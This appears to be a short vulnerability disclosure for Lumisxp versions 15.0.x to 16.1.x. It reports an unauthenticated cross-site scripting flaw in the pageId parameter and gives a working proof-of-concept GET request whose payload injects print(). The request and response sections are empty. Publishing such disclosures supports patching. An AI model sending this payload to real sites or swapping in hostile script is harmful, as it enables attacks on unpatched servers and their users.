rodnt/xss3-lumisxp.md

## xss3-lumisxp.md

      
    Raw
  

              xss3-lumisxp.md
            
          
    Description

Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the pageId parameter.
Request


Payload:
GET /main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa


Request:


Response:


Author: Rodolfo Tavares